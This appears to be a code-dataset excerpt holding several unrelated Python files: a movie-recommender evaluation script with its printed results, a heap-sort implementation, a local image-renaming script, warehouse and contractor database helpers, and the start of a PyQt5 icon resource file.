def testing(train_user, test_user, items, item_numbers, disliked_list, rtmp, user):
    '''
    Compares the old recommender path (recommend) against the new one
    (recommend2) for one user and prints the user's actual ratings.
    NOTE(review): relies on the module-level global `movies_contents`.
    '''
    # Old path.
    negative_items = disliked_list
    recommendations = test_simple_instance(items, item_numbers, negative_items, user)
    print "Recommended movies"
    extracted = extract_names(recommendations, movies_contents)
    print "User {}'s ratings on Recommended movis".format(user)
    examine_list = examine_the_results2(extracted, rtmp, user)
    # New path.
    final = test_simple_instance_test1(test_user, items, item_numbers, disliked_list, user)
    print final
    print "final"
    #recommended_list = list(zip(*recommendations)[0])
    #recommended_list = [int(x)-1 for x in recommended_list]
    # final_extracted = movies_contents.ix[final,:]
    # print "User {}'s ratings on Recommended movis".format(user)
    # examine_list = examine_the_results2(final_extracted, rtmp, user)
    print 'train_user.shape',train_user.shape
    print 'test_user.shape',test_user.shape
    print 'train_user.movieId.unique()',train_user.movieId.unique().size
    print 'test_user.movieId.unique()',test_user.movieId.unique().size
    # final=[]
    # for movie in recommended_list:
    #     if movie in train_user.movieId.unique():
    #         print "movie ",movie,' is in train_user'
    #     if movie in test_user.movieId.unique():
    #         final.append(movie)
    #         print "movie ",movie,' is in test_user'
    print "Final movies"
    final_extracted = movies_contents.ix[final,:]
    print "User {}'s ratings on Final movies".format(user)
    final_examine_list = examine_the_results3(final_extracted, test_user, user)
    print final_examine_list
# user 654(userId 654) All recommendations
# [('186', 0.999988317489624),
# ('208', 0.9999874234199524),
# ('527', 0.9999861121177673),
# ('153', 0.9999856948852539),
# ('125', 0.9999853372573853),
# ('588', 0.9999845027923584),
# ('204', 0.9999845027923584),
# ('485', 0.9999840259552002),
# ('216', 0.9999839067459106),
# ('172', 0.9999837875366211),
# ('419', 0.9999837875366211),
# ('132', 0.9999836683273315),
# ('451', 0.9999836683273315),
# ('202', 0.9999836087226868),
# ('11', 0.9999832510948181),
# ('182', 0.9999831914901733),
# ('71', 0.9999830722808838),
# ('234', 0.9999829530715942),
# ('83', 0.9999829530715942),
# ('237', 0.9999825954437256),
# ('228', 0.999982476234436),
# ('82', 0.9999821782112122),
# ('223', 0.9999821186065674),
# ('385', 0.9999821186065674),
# ('96', 0.9999818801879883),
# ('501', 0.9999818801879883),
# ('95', 0.999981701374054),
# ('1', 0.9999816417694092),
# ('196', 0.9999814629554749),
# ('684', 0.9999814033508301),
# ('288', 0.9999814033508301),
# ('200', 0.9999813437461853),
# ('199', 0.9999813437461853),
# ('28', 0.9999812841415405),
# ('144', 0.9999812841415405),
# ('121', 0.999981164932251),
# ('423', 0.9999811053276062),
# ('484', 0.9999809265136719),
# ('655', 0.9999808073043823),
# ('663', 0.9999805688858032),
# ('174', 0.9999805688858032),
# ('568', 0.9999803304672241),
# ('432', 0.9999803304672241),
# ('69', 0.9999802112579346),
# ('257', 0.9999802112579346),
# ('183', 0.9999801516532898),
# ('179', 0.9999799728393555),
# ('735', 0.9999799728393555),
# ('168', 0.9999799728393555),
# ('181', 0.9999799728393555)]
# user 654(userId 654) Final recommendations
#[588, 71, 196, 144, 98, 83, 82, 69, 204, 568, 215, 174, 317, 66, 269, 735]
# User 654's ratings on Final movies
# [4, 3, 5, 5, 5, 5, 5, 4, 4, 4, 4, 5, 4, 4, 4, 4]
# later...
# def iter_exam(items, item_numbers, disliked_list, movies_contents, rtmp, user):
# num_iter = 10
# examine_list_iter = []
# for i in xrange(num_iter):
# print 'iteration number: ', i+1
# element = rec_eval(items, item_numbers, disliked_list, movies_contents, rtmp, user)
# examine_list_iter.append(element)
# print examine_list_iter
# return examine_list_iter
def count_num_ratings_per_users(ratings_as_mat):
    '''
    To identify the number of ratings per user.
    Returns {1-based userId: count of positive ratings in that user's row}.
    '''
    count_per_users = {}
    tmp = sparse.csr_matrix(ratings_as_mat)
    num_users = tmp.shape[0]
    for i in xrange(num_users):
        # Densify the row and count strictly positive entries.
        ratings_list = [int(x) for x in list(chain.from_iterable(tmp[i].toarray().tolist())) if x > 0]
        count_per_users[i+1] = len(ratings_list)
        # Progress report every 100 users.
        if i % 100 == 0:
            print '<counting number of ratings for user>', i , ' out of ', num_users
    return count_per_users
def recall_at_M(test_user, final_examine_list, num_items):
    '''
    Number of items user i liked among the top M items (test set)
    recall @ M = --------------------------------------------------------------
    Total number of items user i likes (test set)

    "Liked" means a rating of 4 or higher.
    NOTE(review): the denominator used is len(final_examine_list) (i.e. M),
    so this actually computes precision@M; `test_user` and `num_items` are
    unused. Preserved as-is.
    '''
    liked_count = sum(1 for rating in final_examine_list if rating >= 4)
    return float(liked_count) / len(final_examine_list)
if __name__=="__main__":
    # Like/dislike rating thresholds used when the item lists were pickled.
    up=5; down=2
    # 1-based id of the user under evaluation.
    user = 181
    # How many movies did each user rate? (exploratory; kept commented out)
    # count_ratings_per_users = count_num_ratings_per_users(ratings_as_mat)
    # count_ratings_per_users = pd.DataFrame(count_ratings_per_users.items(), columns = ['userId','num_ratings'])
    # count_ratings_per_users = count_ratings_per_users.sort_values(by = 'num_ratings', axis =0, ascending = False)
    # In [145]: count_ratings_per_users
    # Out[145]:
    # userId num_ratings
    # 12 13 526
    # 404 405 520
    # 654 655 443
    # 449 450 423
    # 275 276 400
    # 302 303 385
    # 233 234 369
    # 536 537 349
    # 6 7 328
    # 845 846 321
    # 392 393 318
    # 307 308 314
    # 278 279 308
    # 180 181 308
    # 93 94 306
    # 91 92 296
    # 428 429 295
    # 416 417 292
    # 879 880 288
    # 757 758 287
    # 221 222 286
    # 434 435 285
    # 292 293 280
    # 200 201 279
    # 377 378 276
    # 560 561 275
    # 129 130 273
    # 681 682 273
    # 591 592 271
    # 58 59 270
    '''
    User 13's ratings on Final movies
    [5, 4, 4, 4, 4, 5, 2, 4, 2, 3, 3, 4, 4, 5]
    User 405's ratings on Final movies
    [3, 5, 4, 5, 3, 4, 3, 4, 5, 3, 4, 5, 5, 3, 5, 5, 5, 3]
    User 450's ratings on Final movies
    [4, 5, 3, 5, 3, 4, 5, 5, 3, 3, 5, 3, 5, 4, 3, 5, 4, 4, 5, 3, 4, 4]
    User 276's ratings on Final movies
    [5, 4, 5, 5, 4, 4, 4, 5, 4, 4, 4, 5]
    User 276's ratings on Final movies
    [5, 4, 4, 4, 5, 4, 4, 4, 4, 4, 4, 5, 4]
    User 303's ratings on Final movies
    [4]
    User 303's ratings on Final movies
    [4]
    User 234's ratings on Final movies
    [3, 3, 4]
    User 234's ratings on Final movies
    [3, 4, 2, 3]
    User 537's ratings on Final movies
    [3, 3, 1, 3, 3, 3, 3, 2, 2]
    User 537's ratings on Final movies
    [2, 1, 3, 3, 2, 3]
    User 7's ratings on Final movies
    [5, 4, 5, 5, 1, 3, 5, 5, 5, 5, 5, 5, 4]
    User 7's ratings on Final movies
    [5, 5, 5, 5, 3, 5, 1, 5, 4, 5, 4, 5, 4, 5]
    User 846's ratings on Final movies
    []
    User 393's ratings on Final movies
    [3, 3, 3, 4]
    User 308's ratings on Final movies
    [4, 3, 4, 3, 3, 4, 4]
    User 279's ratings on Final movies
    [3, 3, 3, 1, 4, 5, 4, 3, 3, 4, 1, 5, 4, 3]
    User 181's ratings on Final movies
    [1, 1, 1, 2, 1, 1, 1, 1, 1, 2, 2, 1, 1, 2]
    User 94's ratings on Final movies
    [5, 5, 4, 5, 4, 3, 5]
    User 92's ratings on Final movies
    [4, 3, 3, 4]
    User 429's ratings on Final movies
    [5, 4, 5, 5, 5, 5, 4, 4]
    User 417's ratings on Final movies
    [4, 3]
    '''
    # Preprocessing inputs (the matrix/contents loads are commented out).
    # ratings_as_mat = pickle.load(open('data/ratings_as_mat_train.pkl', 'rb'))
    # movies_as_mat = pickle.load(open('data/movies_as_mat_train_.pkl', 'rb'))
    # movies_contents = pd.read_csv("data/movies.csv")
    # movies_contents = movies_contents.set_index('movieId')
    train_df = pickle.load(open('data/train_df.pkl', 'rb'))
    test_df = pickle.load(open('data/test_df.pkl', 'rb'))
    train_user = train_df[train_df['userId'] == user] # user already rated; used for training
    test_user = test_df[test_df['userId'] == user] # user already rated; used for validation
    # items, item_numbers, disliked_list were built from train_df.
    items = pickle.load(open('data/items_train_{}.pkl'.format((up,down)), 'rb'))
    item_numbers = pickle.load(open('data/item_numbers_train_{}.pkl'.format((up,down)), 'rb'))
    disliked_list = pickle.load(open('data/disliked_list_train_{}.pkl'.format((up,down)), 'rb'))
    # NOTE(review): `ratings_as_mat` (and `movies_contents`, used below) are
    # only defined in the commented-out lines above, so running this as-is
    # raises NameError here. Uncomment those loads to run.
    rtmp = sparse.csr_matrix(ratings_as_mat)
    # examine_list = rec_eval(items, item_numbers, disliked_list, movies_contents, rtmp, user)
    #testing(train_df, test_df, items, item_numbers, disliked_list, rtmp, user)
    # Inlined copy of the `testing` function body:
    negative_items = disliked_list
    recommendations = test_simple_instance(items, item_numbers, negative_items, user)
    print "Recommended movies"
    extracted = extract_names(recommendations, movies_contents)
    print "User {}'s ratings on Recommended movis".format(user)
    examine_list = examine_the_results2(extracted, rtmp, user)
    final = test_simple_instance_test1(test_user, items, item_numbers, disliked_list, user)
    print final
    print "final"
    #recommended_list = list(zip(*recommendations)[0])
    #recommended_list = [int(x)-1 for x in recommended_list]
    # final_extracted = movies_contents.ix[final,:]
    # print "User {}'s ratings on Recommended movis".format(user)
    # examine_list = examine_the_results2(final_extracted, rtmp, user)
    print 'train_user.shape',train_user.shape
    print 'test_user.shape',test_user.shape
    print 'train_user.movieId.unique()',train_user.movieId.unique().size
    print 'test_user.movieId.unique()',test_user.movieId.unique().size
    # final=[]
    # for movie in recommended_list:
    #     if movie in train_user.movieId.unique():
    #         print "movie ",movie,' is in train_user'
    #     if movie in test_user.movieId.unique():
    #         final.append(movie)
    #         print "movie ",movie,' is in test_user'
    print "Final movies"
    final_extracted = movies_contents.ix[final,:]
    print "User {}'s ratings on Final movies".format(user)
    final_examine_list = examine_the_results3(final_extracted, test_user, user)
    # later...
    #examine_list_iter = iter_exam(items, item_numbers, disliked_list, movies_contents, ratings_as_mat, user=654)
    #examine_list_iter = iter_exam(items, item_numbers, disliked_list, movies_contents, rtmp, user=654)
    #or row in examine_list_iter for x in row if x > 0])
|
8,115 | 1262d41be3bf873d003464cb23998dde20fde318 | import array
def swap(arr, first, second):
    """Exchange the elements of *arr* at indices *first* and *second*.

    arr: a mutable sequence.
    first, second: valid indices into arr.
    Mutates arr in place; returns None.
    """
    tmp = arr[first]
    arr[first] = arr[second]
    arr[second] = tmp
def parent(i):
    """
    i: an integer index in a heap.
    Returns the integer index of the parent of the given index
    (-1 for the root, which has no parent).
    """
    # Floor division keeps the result an int on Python 3; the original
    # plain / produced a float there (e.g. parent(0) == -0.5), which is
    # unusable as a sequence index. Behavior on Python 2 ints is unchanged.
    return (i + 1) // 2 - 1
def left(i):
    """
    i: an integer index in a heap.
    Returns the index of the left-child of the given index.
    """
    # 2 * (i + 1) - 1 simplified.
    return 2 * i + 1
def right(i):
    """
    i: an integer index in a heap.
    Returns the index of the right-child of the given index.
    """
    # 2 * (i + 1) simplified.
    return 2 * i + 2
def max_heapify(heap, i):
    """Sift heap[i] down until the subtree rooted at i is a max-heap.

    Assumes the subtrees rooted at the children of i already satisfy the
    max-heap property; only heap[i] may be out of place.

    heap: an array being treated as a binary max-heap.
    i: index of the possibly-misplaced element.
    Mutates heap in place.
    """
    size = len(heap)
    # Child indices, inlined: left = 2i+1, right = 2i+2.
    lc = 2 * i + 1
    rc = 2 * i + 2
    largest = i
    if lc < size and heap[lc] > heap[largest]:
        largest = lc
    if rc < size and heap[rc] > heap[largest]:
        largest = rc
    if largest != i:
        heap[i], heap[largest] = heap[largest], heap[i]
        max_heapify(heap, largest)
# Sample fixture for exercising the heap routines (a compact int array).
example_heap = array.array('i', [16, 4, 10, 14, 7, 9, 3, 2, 8, 1])
def build_max_heap(arr):
    """Rearrange *arr* in place so it satisfies the max-heap property.

    arr: a mutable sequence of mutually comparable items.

    Heapifies bottom-up: every index >= len(arr) // 2 is a leaf and
    already a trivial heap, so only internal nodes are sifted down.
    """
    # // keeps the range bound an int; the original len(arr) / 2 is a
    # float on Python 3 and makes range() raise TypeError. The loop below
    # visits the same indices (len(arr)//2 - 1 down to 0) as the original
    # range(len(arr)/2, 0, -1) with max_heapify(arr, i - 1) did on Python 2.
    for i in range(len(arr) // 2 - 1, -1, -1):
        max_heapify(arr, i)
def max_heapify_unrecursive(heap, i):
    """Iterative sift-down: restore the max-heap property below index i.

    Assumes the subtrees rooted at the children of i already satisfy the
    max-heap property; only heap[i] may be out of place.

    heap: an array being treated as a binary max-heap.
    i: index of the possibly-misplaced element.
    Mutates heap in place.
    """
    size = len(heap)
    while True:
        # Child indices, inlined: left = 2i+1, right = 2i+2.
        lc = 2 * i + 1
        rc = 2 * i + 2
        biggest = i
        if lc < size and heap[lc] > heap[i]:
            biggest = lc
        if rc < size and heap[rc] > heap[biggest]:
            biggest = rc
        if biggest == i:
            return
        heap[i], heap[biggest] = heap[biggest], heap[i]
        i = biggest
def heap_sort(arr):
    """Sort *arr* into ascending order, consuming it.

    arr: a mutable sequence of mutually comparable items; emptied as a
         side effect (matching the original implementation).
    Returns a new list of the items in ascending order.

    Bug fixed: the original popped index 0 and then heapified, but
    pop(0) shifts every element one slot left, scrambling the implicit
    parent/child index relationships; e.g. [7, 3, 6, 1, 2, 5, 4] came
    back unsorted. The standard remedy is to swap the root with the last
    element of the live heap region, shrink the region, and sift the new
    root down.
    """
    def _sift_down(heap, root, size):
        # Restore the max-heap property for the subtree rooted at *root*,
        # considering only the first *size* elements.
        while True:
            largest = root
            lc = 2 * root + 1
            rc = 2 * root + 2
            if lc < size and heap[lc] > heap[largest]:
                largest = lc
            if rc < size and heap[rc] > heap[largest]:
                largest = rc
            if largest == root:
                return
            heap[root], heap[largest] = heap[largest], heap[root]
            root = largest

    n = len(arr)
    # Build the max-heap bottom-up (leaves need no work).
    for i in range(n // 2 - 1, -1, -1):
        _sift_down(arr, i, n)
    sorted_list = []
    # Move the current maximum to the end, detach it, re-heapify the rest.
    for end in range(n - 1, -1, -1):
        arr[0], arr[end] = arr[end], arr[0]
        sorted_list.append(arr.pop())
        _sift_down(arr, 0, end)
    # Maxima were collected first; reverse for ascending order.
    sorted_list.reverse()
    return sorted_list
|
8,116 | d483314fa7e8a2514fd5089b872b9e480e7454f4 | ####################################################################################
# About
# Date: April 12, 2018
# Notes
'''
Code that renames a list of files in a directory
MUST Run in Python 3 environment!
jpeg Drop extra number at the end of unique ID
add DEL or INS based on variant type
'''
'''
Resources
---------
https://gist.github.com/seanh/93666
https://www.youtube.com/watch?v=ve2pmm5JqmI
https://www.youtube.com/watch?v=WQVisBzJGLw
'''
####################################################################################
import os
# Batch-rename svviz screenshot files: strip the '_DEL' marker from each
# name and normalize the extension to .jpeg.
path2 = '/Volumes/lesleydata/manual_Curation_app/images/svviz_JMZook/1000_Rand_Samp_INS_DEL_2/app_images/DEL/PBDEL'
# Reuse path2 rather than repeating the long literal (the original
# duplicated it in os.chdir, which is easy to let drift out of sync).
os.chdir(path2)
for f in os.listdir():
    # Split off the original extension; it is discarded because every
    # output file is written with a .jpeg suffix.
    file_name, file_ext = os.path.splitext(f)
    file_name = file_name.replace('_DEL', '')
    # (Earlier variants also stripped trailing ' 1'..' 12' duplicate
    # counters here; re-add a targeted replace if those reappear.)
    os.rename(os.path.join(path2, f), os.path.join(path2, file_name + '.jpeg'))
|
8,117 | 79c4a2d4503c2639950675b398e000aae367ff4a | from app.models.tables import Warehouse, Contractor, Articles
class ContractorTools(Contractor):
    """
    Helper operations on the contractor (counterparty) reference table.
    """

    @staticmethod
    def add_contractor(**kwargs):
        # Create and persist a new contractor record from the given fields.
        Contractor(**kwargs).insert()

    @staticmethod
    def delete_contractor(**kwargs):
        # Look the record up by its id and remove it.
        record = Contractor().select_expression(id_contr=kwargs['id_contr'])[0]
        record.delete_data()

    @staticmethod
    def update_contractor(**kwargs):
        # Persist the changed fields of an existing contractor.
        Contractor(**kwargs).update_data()

    @staticmethod
    def get_contractors():
        # Fetch every contractor and return it in dict form.
        model = Contractor()
        rows = model.select_expression()
        return dict(contractors=model.db_obj_to_dict(*rows))
class ArticleTools(Articles):
    """
    Helper operations on the articles (goods) reference table.
    """

    @staticmethod
    def add_article(**kwargs):
        # Create and persist a new article record from the given fields.
        Articles(**kwargs).insert()

    @staticmethod
    def update_article(**kwargs):
        # Persist the changed fields of an existing article.
        Articles(**kwargs).update_data()

    @staticmethod
    def delete_article(**kwargs):
        # Look the record up by its id and remove it.
        record = Articles().select_expression(id_art=kwargs['id_art'])[0]
        record.delete_data()
class WarehouseTools(Warehouse):
    """
    Helper operations on the storage-location (warehouse) reference table.
    """

    def set_new_name(self, id_ws, name):
        """Rename the warehouse identified by *id_ws*; returns True."""
        record = super().select_expression(id_ws=id_ws)[0]
        record.name.set_value(name)
        record.update_data()
        return True

    def delete_warehouse(self, id_ws, name):
        """Delete the warehouse *id_ws* plus its children and grandchildren.

        Descendants are removed deepest-first so no orphaned rows remain.
        Returns True.
        """
        record = super().select_expression(id_ws=id_ws)[0]
        for child in super().select_expression(id_higher=id_ws):
            for grandchild in super().select_expression(id_higher=child.id_ws.value):
                grandchild.delete_data()
            child.delete_data()
        record.delete_data()
        return True

    @staticmethod
    def add_warehouse(id_higher, name):
        """Insert a new warehouse one level below *id_higher*.

        If *id_higher* does not match an existing warehouse, the new row
        becomes a top-level (level 1) warehouse. Returns True.
        """
        ws = Warehouse(name=name, id_higher=id_higher)
        try:
            parent = ws.select_expression(id_ws=id_higher)[0]
            level = parent.level.value + 1
        except IndexError:
            # No such parent: place the warehouse at the root.
            level = 1
            id_higher = None
        ws.level.set_value(level)
        ws.id_higher.set_value(id_higher)
        ws.insert()
        return True

    @staticmethod
    def move_warehouse(id_ws, id_higher):
        """Re-parent warehouse *id_ws* under *id_higher* ('' means root)."""
        if id_higher == '':
            id_higher = None
        record = Warehouse().select_expression(id_ws=id_ws)[0]
        record.id_higher.set_value(id_higher)
        record.update_data()
        return True

    @staticmethod
    def get_warehouses():
        # Fetch every warehouse and return it in dict form.
        model = Warehouse()
        rows = model.select_expression()
        return dict(warehouses=model.db_obj_to_dict(*rows))

    @staticmethod
    def get_ws_tree():
        # Full warehouse hierarchy as produced by the model layer.
        return Warehouse().get_full_tree()
|
8,118 | dbf831540d11a994d5483dc97c7eab474f91f0d3 | # -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.15.0)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x01\xde\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x28\x00\x00\x00\x28\x08\x06\x00\x00\x00\x8c\xfe\xb8\x6d\
\x00\x00\x01\xa5\x49\x44\x41\x54\x78\x9c\xed\xd8\x3f\x6b\x14\x41\
\x1c\x87\xf1\x4f\x42\x2c\x8d\x45\x88\x58\x0b\x22\x24\x20\xa4\xb0\
\x49\xa3\x28\x8a\x08\xfe\x69\x24\x4d\xf0\xcc\xeb\x4a\x61\x52\xa8\
\x2f\xc1\xca\x22\x20\x36\x82\x58\x59\x58\x08\x2a\x68\xa2\x44\xc5\
\x34\x81\xa8\x9b\x62\x38\x18\xe6\x76\x6f\x2f\x97\x9d\x35\x1c\xfb\
\xc0\xc0\xdd\xcc\xee\xcd\xb3\xbf\xd9\xfd\xde\xdc\xd1\xd1\x71\x32\
\xb8\x8f\xef\x28\x8e\xd8\xbe\xe2\x56\x1b\x82\xdb\xb8\x3c\xc6\x79\
\x37\xf0\xbe\x61\x97\x52\x8a\x31\xcf\x3b\x83\x5f\x4d\x8a\xa4\x4c\
\xe7\xfc\xf0\x26\x98\x78\xc1\x7d\xfc\x73\xf4\x87\x2b\x6e\xdf\x70\
\xb7\x6e\xa2\x71\xef\xc1\x26\x58\xc6\xa7\xba\x83\xfe\xa7\xe0\xd0\
\xf9\x27\xfe\x1e\xcc\xce\x44\x08\xae\x0a\x61\x7c\x9c\x27\xb5\xae\
\x89\x5e\x1f\x60\x3d\x95\xa8\xba\x49\x67\xf1\x03\x0b\x23\x5c\x48\
\x53\x9c\xc3\xef\xfe\x9b\xba\x0a\xae\xe0\x05\xde\xe5\x34\x4a\xb8\
\x87\xe7\x69\x67\x55\x05\x5f\xe2\x4e\x56\x9d\x41\x5e\xe1\x76\xda\
\x59\x26\x78\x41\xd8\x4e\xcd\xe4\x36\x8a\xb8\x88\x2f\xf1\x9c\xc3\
\x96\xf8\x21\x9e\xe2\x4f\x66\xa9\x98\x1e\x9e\x94\xcd\x99\x56\x70\
\x1a\x1f\x71\xa9\x05\xa9\x78\xce\xcf\x58\x2c\x1b\x4c\x05\xaf\xe1\
\x4d\x6e\xa3\x84\x9b\x78\x9d\x76\x56\x2d\xf1\x1a\x1e\x67\xd5\x19\
\xa4\x87\x8d\xaa\xc1\xb8\x82\xa7\x85\xec\x9b\xcf\x2c\x14\x33\x8b\
\x9f\x98\x4b\x07\xca\x2a\xf8\x00\x5b\xc2\x8f\xa8\xb6\xe8\xe7\xed\
\x6e\xd5\x01\x71\x05\xb7\x84\xb0\x6c\x93\xda\xbc\xed\x0b\x9e\xc7\
\x0e\x4e\xe5\x36\x8a\x18\x9a\xb7\xe9\x12\xf7\xf0\x4c\xf8\xc2\x6e\
\x8b\x91\xf2\xb6\xc0\x14\x3e\x60\xa9\x05\xa9\x3e\x23\xe7\x6d\x81\
\xab\x78\x9b\x59\x28\xe5\xba\x9a\xbc\x8d\x97\xb8\x87\xcd\xac\x3a\
\x83\x3c\x32\x62\xde\x16\x42\xf6\x9d\xcd\x69\x13\x31\x25\xfc\xa7\
\xb3\xa3\x24\xfb\xca\xd8\x93\x77\xc7\x9c\xb6\xbf\xc2\x1e\xf3\xca\
\x31\x2f\xb4\xa3\xa3\xe3\xc4\x73\x08\x28\x98\x98\x24\xc8\xdd\xa5\
\x40\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x03\xab\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x10\x00\x00\x00\x10\x08\x03\x00\x00\x00\x28\x2d\x0f\x53\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x00\x84\
\x50\x4c\x54\x45\x32\x37\x39\x00\x00\x00\x32\x37\x39\x32\x37\x39\
\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\
\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\
\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\
\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\
\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\
\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\
\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\x37\x39\x32\
\x37\x39\x32\x37\x39\xff\xff\xff\xeb\x7d\xd9\x30\x00\x00\x00\x2a\
\x74\x52\x4e\x53\x00\x00\x2c\xcf\xb7\x01\x18\x20\x1f\x1c\x15\xbd\
\x78\xc3\xc1\x77\x27\x31\x95\xbe\x2d\xdf\x50\x22\x1e\xca\xdc\x24\
\xc2\x28\x26\x32\x1d\x11\xb9\x4d\xf4\x12\xde\x4f\x88\xe0\xc4\x83\
\x03\xa2\x00\x00\x00\x01\x62\x4b\x47\x44\x2b\x24\xb9\xe4\x08\x00\
\x00\x00\x07\x74\x49\x4d\x45\x07\xe4\x09\x04\x02\x0c\x2c\x5e\x9a\
\xf1\x93\x00\x00\x00\x89\x49\x44\x41\x54\x18\xd3\x55\xcf\xd9\x12\
\x82\x30\x10\x44\xd1\x8e\x18\x88\xc8\xb0\xb8\x05\x01\x41\x41\x41\
\xf3\xff\x1f\x68\x36\x04\xef\x5b\x9f\xaa\xa9\x4a\x80\x75\x9b\x60\
\x0b\x1e\x46\xc2\x16\xed\x78\xbc\x57\x01\x12\x4a\x5d\x94\xe5\xc5\
\xe1\x78\xc2\xf9\x22\xa4\xad\x2c\xe8\x5a\xc4\x40\x25\xfc\x7d\xdd\
\x28\xba\x71\x0d\x12\x8c\xe9\xdd\x36\xaa\xe9\xb2\xbb\x03\xb7\xa9\
\x2e\x29\x9a\xc1\xec\x16\x32\x9d\xe1\xd1\x9b\xbd\x82\xe1\xd9\xeb\
\xbd\x82\x7c\x78\xe1\x0f\x6c\x6c\x01\x9f\x07\xb1\xfc\x4d\x18\x18\
\x27\xff\x74\x29\xc5\x44\x21\xf0\x1e\xab\x5f\x9f\x84\xe3\x0b\x50\
\xe9\x0c\xb4\xd8\x75\xd4\x0e\x00\x00\x00\x25\x74\x45\x58\x74\x64\
\x61\x74\x65\x3a\x63\x72\x65\x61\x74\x65\x00\x32\x30\x32\x30\x2d\
\x30\x37\x2d\x31\x39\x54\x30\x33\x3a\x33\x39\x3a\x32\x30\x2b\x30\
\x30\x3a\x30\x30\x86\x67\x0e\x5c\x00\x00\x00\x25\x74\x45\x58\x74\
\x64\x61\x74\x65\x3a\x6d\x6f\x64\x69\x66\x79\x00\x32\x30\x31\x39\
\x2d\x30\x31\x2d\x30\x38\x54\x31\x39\x3a\x34\x39\x3a\x34\x36\x2b\
\x30\x30\x3a\x30\x30\xb0\x72\x32\xb2\x00\x00\x00\x20\x74\x45\x58\
\x74\x73\x6f\x66\x74\x77\x61\x72\x65\x00\x68\x74\x74\x70\x73\x3a\
\x2f\x2f\x69\x6d\x61\x67\x65\x6d\x61\x67\x69\x63\x6b\x2e\x6f\x72\
\x67\xbc\xcf\x1d\x9d\x00\x00\x00\x18\x74\x45\x58\x74\x54\x68\x75\
\x6d\x62\x3a\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3a\x3a\x50\x61\
\x67\x65\x73\x00\x31\xa7\xff\xbb\x2f\x00\x00\x00\x19\x74\x45\x58\
\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\x3a\x48\
\x65\x69\x67\x68\x74\x00\x31\x30\x36\x38\x8a\xfc\x51\x92\x00\x00\
\x00\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\
\x67\x65\x3a\x3a\x57\x69\x64\x74\x68\x00\x31\x30\x36\x38\x9f\xb5\
\x8d\x8b\x00\x00\x00\x19\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\
\x3a\x4d\x69\x6d\x65\x74\x79\x70\x65\x00\x69\x6d\x61\x67\x65\x2f\
\x70\x6e\x67\x3f\xb2\x56\x4e\x00\x00\x00\x17\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x4d\x54\x69\x6d\x65\x00\x31\x35\x34\x36\
\x39\x37\x36\x39\x38\x36\x42\x37\xbe\xd0\x00\x00\x00\x12\x74\x45\
\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x53\x69\x7a\x65\x00\x31\x38\
\x32\x33\x37\x42\x1b\x5d\x79\xed\x00\x00\x00\x5a\x74\x45\x58\x74\
\x54\x68\x75\x6d\x62\x3a\x3a\x55\x52\x49\x00\x66\x69\x6c\x65\x3a\
\x2f\x2f\x2f\x64\x61\x74\x61\x2f\x77\x77\x77\x72\x6f\x6f\x74\x2f\
\x77\x77\x77\x2e\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x6e\x65\x74\
\x2f\x63\x64\x6e\x2d\x69\x6d\x67\x2e\x65\x61\x73\x79\x69\x63\x6f\
\x6e\x2e\x63\x6e\x2f\x66\x69\x6c\x65\x73\x2f\x31\x31\x39\x2f\x31\
\x31\x39\x30\x37\x31\x30\x2e\x70\x6e\x67\x5a\xd1\x76\x4b\x00\x00\
\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x07\x27\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x18\x00\x00\x00\x18\x08\x03\x00\x00\x00\xd7\xa9\xcd\xca\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x02\x01\
\x50\x4c\x54\x45\x00\x00\x00\xae\xad\xb3\x8c\x89\x93\x8b\x88\x92\
\x88\x84\x8f\x8d\x8a\x94\x85\x81\x8c\x85\x82\x8c\x8a\x87\x91\x8c\
\x89\x92\xab\xaa\xb0\x8f\x8c\x96\x8e\x8b\x95\x8e\x8b\x94\x90\x8e\
\x97\x8b\x87\x92\x9a\x98\xa1\x98\x96\x9e\x8e\x8c\x95\x86\x83\x8e\
\xae\xad\xb3\xae\xad\xb3\xaa\xa9\xaf\x90\x8d\x97\x8b\x88\x92\x8c\
